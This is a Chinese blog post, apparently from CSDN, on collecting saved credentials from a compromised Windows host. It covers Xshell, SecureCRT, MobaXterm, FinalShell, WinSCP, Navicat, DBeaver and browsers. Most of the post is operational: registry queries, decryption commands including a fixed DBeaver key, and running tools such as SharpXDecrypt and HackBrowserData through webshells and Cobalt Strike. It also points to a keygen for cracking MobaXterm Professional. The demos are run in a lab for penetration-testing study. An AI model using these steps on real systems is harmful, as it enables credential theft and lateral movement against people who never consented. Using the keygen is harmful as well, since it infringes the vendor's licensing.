内网凭据收集

最新推荐文章于 2024-06-04 09:37:00 发布
最新推荐文章于 2024-06-04 09:37:00 发布
阅读量989 收藏 18
点赞数 27
分类专栏: 渗透测试 文章标签: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44288604/article/details/135219538
版权

目录

对网上的文章进行了学习、复现以及细节完善

查看已安装软件信息

查看已安装程序,判断机器作用及价值,这种查询方式不靠谱,能获取到远程桌面的话,还是通过控制面板吧

WMI查询Win32_Product这种方式获取的已安装程序列表并不完整,因为这种方只能获取那些通过Windows Installer安装的程序,所以其它方式安装的程序就会无法获取。

wmic product get name,version
powershell "Get-WmiObject -class Win32_Product |Select-Object -Property name,version"

更多方式,参见:https://mp.weixin.qq.com/s/CAEtoKe6ijO39xMVZPRKkw
无特殊说明,默认安装的是软件最新版。

0X1 运维开发

Xshell

Xshell目前主要有Xshell5、Xshell6、xshell7 三个版本,session文件分别保存在如下位置

  1. xshell 5:%userprofile%\Documents\NetSarang\Xshel\lSessions
  2. xshell 6:%userprofile%\Documents\NetSarang Computer6\XshellS\essions
  3. xshell7:%userprofile%\Documents\NetSarang Computer\7\Xshell\Sessions

Xftp 一样的,只是把路径中xshell改成xftp就行。
利用前提:存在记住密码的主机
image.png
image.png

使用SharpXDecrypt

测试发现,无论是否设置主控密码,均不受影响

利用工具:SharpXDecrypt https://github.com/JDArmy/SharpXDecrypt
Xshell全版本凭证一键恢复工具,针对Xshell全版本在本地保存的密码进行解密,包括最新的7系列版本!
通过Webshell运行时,360安全卫士拦截,360杀毒查杀。现在手动退出360。
image.png

  1. 使用Webshell

工具支持自动寻找session路径、指定session路径
image.png

  1. 使用CS

使用execute-assembly命令,你需要提供要执行的程序的路径。可以是本地文件系统的绝对路径,也可以是远程服务器上的文件路径。该命令将会在目标系统上启动指定的程序集,并执行其中的代码。

execute-assembly /path/to/SharpXDecrypt.exe
execute-assembly /path/to/SharpXDecrypt.exe  "C:\Users\asus\Documents\NetSarang Computer\7\Xshell\Sessions"

image.png

使用Ladon

测试发现,无论是否设置主控密码,均不受影响

image.png

SecureCRT

当前最新版 9.x 无法解密

下载与安装参见:https://blog.csdn.net/qq_39052513/article/details/100272502
利用前提时管理员登录时勾选了记住密码。
image.png
SecureCRT密码密码存放位置:%APPDATA%\VanDyke\Config\Sessions\
image.png
这里选中下载一个旧版本 8.0.4 :https://www.vandyke.com/download/prevreleases.html

加密说明

SecureCRT 7.3.3 之前的版本使用 password 加密算法,之后的版本使用 password v2 算法:

S:"Password"=u17cf50e394ecc2a06fa8919e1bd67cf0f37da34c78e7eb87a3a9a787a9785e802dd0eae4e8039c3ce234d34bfe28bbdc
S:"Password V2"=02:7b9f594a1f39bb36bbaa0d9688ee38b3d233c67b338e20e2113f2ba4d328b6fc8c804e3c02324b1eaad57a5b96ac1fc5cc1ae0ee2930e6af2e5e644a28ebe3fc

解密工具:https://github.com/HyperSine/how-does-SecureCRT-encrypt-password

# 7.x 版本解密 [不带第一位 "u"]
SecureCRTCipher.py dec 17cf50e394ecc2a06fa8919e1bd67cf0f37da34c78e7eb87a3a9a787a9785e802dd0eae4e8039c3ce234d34bfe28bbdc

# 8.x 版本解密 [不带前面三位 "02:"]
SecureCRTCipher.py dec -v2 7b9f594a1f39bb36bbaa0d9688ee38b3d233c67b338e20e2113f2ba4d328b6fc8c804e3c02324b1eaad57a5b96ac1fc5cc1ae0ee2930e6af2e5e644a28ebe3fc

解密

Ladon_10.10.4_20230501无法解密SecureCRT 8.x,7.x未测试

  1. 获取目标版本

命令:wmic product get name,version
image.png

  1. 寻找保存的密码
echo "%APPDATA%\VanDyke\Config\Sessions\"
dir C:\Users\Administrator\AppData\Roaming\VanDyke\Config\Sessions\
type C:\Users\Administrator\AppData\Roaming\VanDyke\Config\Sessions\192.168.229.128.ini | more

image.png

  1. 解密

image.png

Mobaxterm

MobaXterm连接信息默认全部加密存于注册表中,解密两种情况。
下载地址(包含历史版本)https://mobaxterm.mobatek.net/download-home-edition.html

官方提供了MobaXterm重置管理密码工具,但是会导致保存的密码丢失:https://mobaxterm.mobatek.net/resetmasterpassword.html

利用工具:https://github.com/HyperSine/how-does-MobaXterm-encrypt-password/tree/master

带管理密码的解密

利用前提:必须知道管理密码

此处测试的 MobaXterm(免费版) 为最新版 23.2,一旦想保存主机密码,该版本会强制你设置管理密码。
96.gif
使用微信截图翻译,看一下写的是个啥。这里就按默认设置保存吧。
image.png
攻击如下:
查询注册表中保存的密码信息【设置了管理密码,才会是下面那种格式】

reg query HKEY_CURRENT_USER\Software\Mobatek\MobaXterm\P

image.png
离线破解密码

.\MobaXtermCipher.py dec -p 123456789 46QIknBw

image.png

扩展(激活、汉化)

  1. 激活

github上能搜到破解的项目:https://github.com/malaohu/MobaXterm-GenKey

pip install --no-cache-dir -r requirements.txt
python app.py

image.png
生成的key直接放到软件目录即可!然后就会发现免费版变成专业版了
image.png

  1. 汉化

github上能找到:https://github.com/RipplePiam/MobaXterm-Chinese-Simplified
测试发现,解压出2个文件,这2个文件需要单独放置在一个文件夹中才行,运行exe就是中文的。
这种就风险未知了!
image.png

无管理密码的解密

此处测试的 MobaXterm 版本为 12.04 ,该版本不会强制你为连接设置管理密码。
免安装版失败
网上找了个下载地址,就当测试下非安装版的攻击效果了:https://www.52pojie.cn/thread-1088848-1-1.html
1.gif
结果尴尬,注册表没有写入账密,exe所在文件夹生成了一个配置文件,但是配置文件无法解密。
安装版成功
想办法下载个安装版:https://www.filehorse.com/download-mobaxterm/old-versions/page-2/

reg query HKEY_CURRENT_USER\Software\Mobatek\MobaXterm
reg query HKEY_CURRENT_USER\Software\Mobatek\MobaXterm\P

image.png

# 格式
python .\MobaXtermCipher.py dec -sysh <主机名> -sysu <计算机用户名> -h <目标主机> -u <登录用户名> <加密后的密码>
# 举例
python .\MobaXtermCipher.py dec -sysh win2012-demo -sysu administrator -h 192.168.229.128 -u kali 3EYOBCiQgN3xI/E4jbtmdMZYVIkNhFR7

image.png

Finalshell

利用前提:用户登录时必须勾选记住密码

添加一个连接,然后我们就会在%userprofile%\AppData\Local\finalshell\conn下看到一个 json 文件,这个 json 文件有多少个,就相当于是建立了多少个连接。
image.png
image.png
把 json 文件保存下来,使用工具(JDK8):https://github.com/passer-W/FinalShell-Decoder
image.png

WinSCP

它把加密后的密码放在了注册表中
image.png

  1. 获取加密信息
reg query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions"
reg query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\admin@192.168.229.129"

image.png

  1. 解密

方式1:下载工具:https://github.com/anoopengineer/winscppasswd

# 格式
winscppasswd.exe <主机>  <用户名>  <加密密码>

# 举例:
winscppasswd.exe 192.168.229.129 admin A35C4051C12F2D49DE8273217C8B2F4A3A3D383135326D656E726D 6A64726E6E65726D6E653D383135326D6E6FAF95D4BD2E

image.png
方式2:下载工具:https://github.com/uknowsec/SharpDecryptPwd
它会自动查注册表并解密
image.png

0X2 数据库

Navicat

Navicat是一套可创建多个连接的数据库管理工具,用以方便管理 MySQL、Oracle、PostgreSQL、SQLite、SQL Server、MariaDB和/或 MongoDB 等不同类型的数据库,并支持管理某些云数据库,例如阿里云、腾讯云。连接信息是存在注册表里面:

数据库注册表位置
MySQLHKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\
MariaDBHKEY_CURRENT_USER\Software\PremiumSoft\NavicatMARIADB\Servers\
MicrosoftSQLHKEY_CURRENT_USER\Software\PremiumSoft\NavicatMSSQL\Servers\
OracleHKEY_CURRENT_USER\Software\PremiumSoft\NavicatOra\Servers\
PostgreSQLHKEY_CURRENT_USER\Software\PremiumSoft\NavicatPG\Servers\
SQLiteHKEY_CURRENT_USER\Software\PremiumSoft\NavicatSQLite\Servers\
MongoDBHKEY_CURRENT_USER\Software\PremiumSoft\NavicatMONGODB\Servers\

这里就只测下用mysql举例子, 其他都一样

方式1:离线解密

https://github.com/HyperSine/how-does-navicat-encrypt-password/tree/master/python3
首先查询 Navicat 注册表里的密码:

reg query HKEY_CURRENT_USER\Software\PremiumSoft\ /s /v host
reg query HKEY_CURRENT_USER\Software\PremiumSoft\ /s /v username
reg query HKEY_CURRENT_USER\Software\PremiumSoft\ /s /v pwd

这种查询命令需要用powshell运行,可奇怪的是,Webshell中调用powshell,有的命令可以执行成功,有的命令执行失败(下图中,哥斯拉、冰蝎都可以查询powshell版本,但无法查询注册表)
image.png
然而在靶机上面,可以正常进行查询
image.png
所以只能在靶场上面演示了:
image.png
image.png

方式2:在线解密

Ladon_10.10.4_20230501无法解密Navicat 16,其他版本未测试

下载工具:https://github.com/uknowsec/SharpDecryptPwd
image.png

DBeaver

利用前提:用户登录时必须勾选记住密码

dbeaver是免费和开源(GPL)为开发人员和数据库管理员通用数据库工具。易用性是该项目的主要目标,是经过精心设计和开发的数据库管理工具。
image.png
密码是加密的,放在:%userprofile%\AppData\Roaming\DBeaverData\workspace6\General.dbeaver\credentials-config.json
image.png
离线解密:使用openssl解密,将credentials-config.json文件放入当前目录。
在data-sources.json中找到连接过的主机,套用解密出的密码即可。

openssl aes-128-cbc -d -K  babb4a9f774ab853c96c2d653dfe544a -iv 00000000000000000000000000000000 -in  credentials-config.json | dd bs=1 skip=16

image.png

0x3 浏览器

其他工具如:https://www.nirsoft.net/utils/web_browser_password.html
如果看针对具体浏览器的单独工具,参考链接中的文章可以看看。
这里使用:HackBrowserData 就足够了。

.\hack-browser.exe -b all -f json --dir results -zip
.\hack-browser.exe -b all -f csv --dir results -zip

如果是本地管理员,只能读取火狐的信息。需要是系统管理员才能读取所有的。
image.png

参考

地址1:内网渗透 | 最全的内网凭据密码收集方法和技巧总结
地址2:内网渗透 | 最全的内网凭据密码收集方法和技巧总结
内网渗透之常用工具密码获取技巧

lainwith
关注
专栏目录
红队内网攻防渗透:内网渗透内网对抗:信息收集篇&SPN扫描&DC定位&角色区域定性&服务探针&安全防护&凭据获取
HACKONE的博客
06-22 317
例如FTP服务器、E-Mail服务器及网站服务器等允许外部用户访问这些服务器,但不可能接触到存放在内网中的信息,就算黑客入侵DMZ 中服务器,也不会影响到公司内部网络安全,不允许任何外部网络的直接访问,实现内外网分离,在企业的信息安全防护加了一道屏障。扩大范围,利用域管理员可以登陆域中任何成员主机特性,定位出域管理员登陆过的主机IP,设法从域成员主机内存中dump出域管理员密码,进而拿下域控制器、渗透整个内网。IP、网关、DNS、出网判断、本机网络连接以及开放端口、本机的代理,域名是什么等。
51-2 内网信息收集 - 用户密码收集
最新发布
weixin_43263566的博客
07-02 86
然而,如果你只拿到了一个域成员账户,是无法进行提权的。因为域成员账户只具备普通用户权限,没有权限提升的空间,除非域管理员将该成员账户添加到管理员组。在这个演示中,我们假设已经成功获取到运行Windows Server 2012的域管理员主机的Meterpreter会话,实战中我们可以通过文件上传、钓鱼或其他服务漏洞手段来获取低权限会话。Windows系统的登录密码储存在本地的SAM文件中,登录时系统会将用户输入的密码与SAM文件中的哈希值进行比对,匹配则认证成功。导出用户的登录凭证信息。
获取WinSCP保存的密码
SawyerYong的博客
04-10 6121
获取WinSCP保存的密码 使用sftp连接server后, 如果勾选了保存密码, winSCP会将密码保存在WinSCP.ini文件下 但是保存的密码是经过加密的, 接下来就要下载Winscppwd工具来获取密码。 下载地址:Winscppwd下载 如果下载不了,可在网盘下载: 网盘链接 提取码:skh4 打开cmd, 进入winscppwd.exe所在目录,输入如下命令 Winscppwd ...
探秘WinSCP密码提取器:找回遗忘的SSH会话密码
gitblog_00084的博客
06-04 548
探秘WinSCP密码提取器:找回遗忘的SSH会话密码 项目地址:https://gitcode.com/anoopengineer/winscppasswd 项目简介 在日常工作中,我们常常依赖像WinSCP这样的工具来管理远程服务器文件,而保存的SSH会话密码无疑提高了工作效率。然而,一旦忘记了这些密码,就可能会陷入困境。幸运的是,有一个开源项目——WinSCP Password Extract...
几种方法来实现scp拷贝时无需输入密码
热门推荐
nfer_cn的专栏
01-15 16万+
多种方法实现scp命令时无需输入远端的用户密码。
关于Winscp 密码获取解密
Coisini的博客
06-15 3019
WINSCP默认保存用户密码在注册表中的如下位置 HKEY_USERS\SID\Software\Martin Prikryl\WinSCP 2\Sessions\ 但是WIN7\8下WinSCP默认路径在: C:\Users\USERNAME\AppData\Local\VirtualStore\Program Files (x86)\WinSCP\WinSCP.ini (64位操作系统) ...
python 找回 WinSCP 密码
01-12
python 找回 WinSCP保存在本地的服务器密码,不需要保存ini,直接运行,读取注册表输出所有保存的密码,安全方便!
内网渗透测试的艺术[二]凭证收集
weixin_42998420的博客
10-22 1392
内网渗透测艺术一凭证收集 收集本机凭据是非常重要的环节.通常我们可以收集凭据包括但不限于:Windows hash [NTLM,LM],浏览器密码、cookie 远程桌面密码 VPN密码 WLAN密码 IIS服务器密码 FTP密码等等. WINDOWS密码 Windows密码加密后一般两种形式 NTLM哈希和LM哈希[VISTA和2008已经取消]这些哈希有两个存储位置,本地用户在SAM...
内网渗透-信息收集之本机收集(命令、工具及脚本)
nilwiaoglwigjwlg的博客
09-25 6354
后渗透攻防: https://www.secpulse.com/archives/51527.html https://3gstudent.github.io/ 目录 一、内网信息收集 1 1.内网基础信息: 1 2.内网核心业务信息: 1 3.其他信息 2 二、内网实战(命令、工具及脚本) 2 1.用户列表、当前权限等 2 2.内网网络拓扑等信息 2 3.进程列表 3 4.端口信息 3 5.补丁...
红队内网攻防渗透:内网渗透之Windows内网信息收集内网和域
HACKONE的博客
04-10 203
Telnet协议是tcp/ip协议的一员是Internet远程登陆服务的标准协议和主要方式,快速探测某台主机是否存在某个高危漏洞端口可以使用这个在内网中通常会部署大量的网络安全设备例如IDSIPS日志审计安全网关反病毒等在域网络攻击测试中获取域内一个支点后需要获得域管理员权限在一个域中,当计算机加入域后会默认给域管理员组赋予本地系统管理员权限也就是说当计算机被添加到域中成为域主机系统就会自动将域管理员组添加到本地系统管理员组中因此域管理组的成员均可以访问本地计算机且具备完全的控制权。
winscppasswd 是为 WinSCP 解密工具,帮助你将密码找回来
10-18
winscppasswd 是 WinSCP Password Extractor/Decrypter/Revealer 的缩写,意为 WinSCP 解密工具,以命令行形式运行。 winscppasswd 帮助你将密码找回来
破解winscp配置文件的密码
07-30
破解winscp配置文件的密码,下载后打开,然后winscp工具中获取服务器配置文件WinSCP.ini,打开cmd,切换到winscppwd.exe的存放目录,运行Winscppwd "XXXXXXXXX\WinSCP.ini"(winscp.ini的地址)
SecurityXploded小工具合集
11-15
简介: SecurePasswordGenerator 安全密码生成器 SSLCertStoreViewer 查看本地系统已安装的SSL证书. ProcHeapViewer 查看系统进程的堆栈. WindowsAutoReboot 电脑自动重启工具. WindowsAutoupdateDisable 关闭系统自动更新. HashCompare 哈希比较工具如MD5,SHA1或SHA256的执行基于诚信比较哈希. SaltedHashGenerator 哈希值生成器 DownloadHashVerifier 检查下载文件的完整性的一个小程序. StreamArmor 快速扫描系统,对恶意文件进行删除. SHA256SaltedHashKracker 破解和恢复丢失的密码。 SpyDLLRemover 显示DLL京城内的各种威胁程度,消除恶意DLL软件. WindowsUserManager 用户管理工具,可以快速启用或禁用用户. DllHijackAuditor 用于发现Windows应用程序中存在漏洞的的DLL. EncryptedFileScanner 专门扫描加密文件的工具,检查计算机中是否存在着加密文件 WindowsAutorunDisable 自动运行禁用工具.
破解winScp工具 保存在本地的 密码
fuming0210sc的专栏
12-08 9858
以下为总结:    1. winscp在本地文件中保存了登录服务器的账号和密码,只是将这些信息加密了。 这个文件 一般在 winscp目录下的 一个名字叫 winscp.ini的文件。所以我们只需要搜索winscp目录下的winscp.ini即可找到。 2.我们需要破解密码,只需要 用 winscppwd工具破解即可。 winscppwd工具 下载链接:  3.dos命令:  cd 到
渗透系列:Firefox 本地保存密码破解 (破解key3.db, signons.sqlite , key4.db, logins.json)
weixin_54626591的博客
01-08 1104
Firefox 本地保存密码破解 (破解key3.db, signons.sqlite , key4.db, logins.json)
使用xshell实现内网穿透与socket代理
weixin_45956148的博客
07-31 2844
使用xshell实现内网穿透与socket代理 内网穿透:即NAT穿透,网络连接时术语 计算机是局域网内时,外网与内网的计算机节点需要连接通信,有时就会出现不支持内网穿透 就是说映射端口,能让外网的电脑找到处于内网的电脑,提高下载速度 不管是内网穿透还是其他类型的网络穿透,都是网络穿透的统一方法来研究和解决 +++++++++++++++++++++++++++++++++额外扩展+++++++++++++++++++++++++++++++++ 透传,即透明传输(pass-through) 指的是在通讯
winscp 编译_关于Winscp 密码获取解密
weixin_39758048的博客
12-08 461
WINSCP默认保存用户密码在注册表中的如下位置DefaultHKEY_USERSSIDSoftwareMartin PrikrylWinSCP 2Sessions但是WIN78下WinSCP默认路径在:DefaultC:甥敳獲甥䕓乒AMEAppDataLocalVirtualStoreProgram Files (x86)WinSCPWinSCP.ini (64位操作系统)C:Program F...
解密MobaXterm加密密码:揭示隐藏在深处的凭证信息
gitblog_00063的博客
05-26 641
解密MobaXterm加密密码:揭示隐藏在深处的凭证信息 项目地址:https://gitcode.com/HyperSine/how-does-MobaXterm-encrypt-password 在日常工作中,尤其是在使用MobaXterm管理远程服务器时,我们常常会存储一些敏感的用户名和密码。然而,这些信息在MobaXterm中是以加密形式存在,使得其看起来不可读。现在,一个名为Reveal...
内网渗透 | 最全的内网凭据密码收集方法和技巧总结
Ms08067安全实验室
02-03 7747
内网凭据密码收集指南原创投稿作者:深蓝实验室天威战队前言在攻防场景下,红队人员拿下一台终端或服务器后,第一步要做的往往就是信息收集,为最大化利用权限,扩大战果,密码抓取必不可少,这里针对常见应用软件和系统等密码抓取做了记录和总结,希望能帮助你作为参考。RDP凭证本机RDP密码抓取本机RDP密码是一个我们常遇到的场景,通常使用mimikatz抓取RDP密码。当系统为win10或2012R2以上时,默...
内网渗透技术与信息收集指南
"内网渗透工具与流程.pptx 是一份关于内网渗透测试的资料,详细介绍了内网信息收集的多种方法和使用的工具,涵盖了从基础的信息收集到更深入的系统分析。这份资料适用于网络安全专业人士,旨在提升对内网安全的理解...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值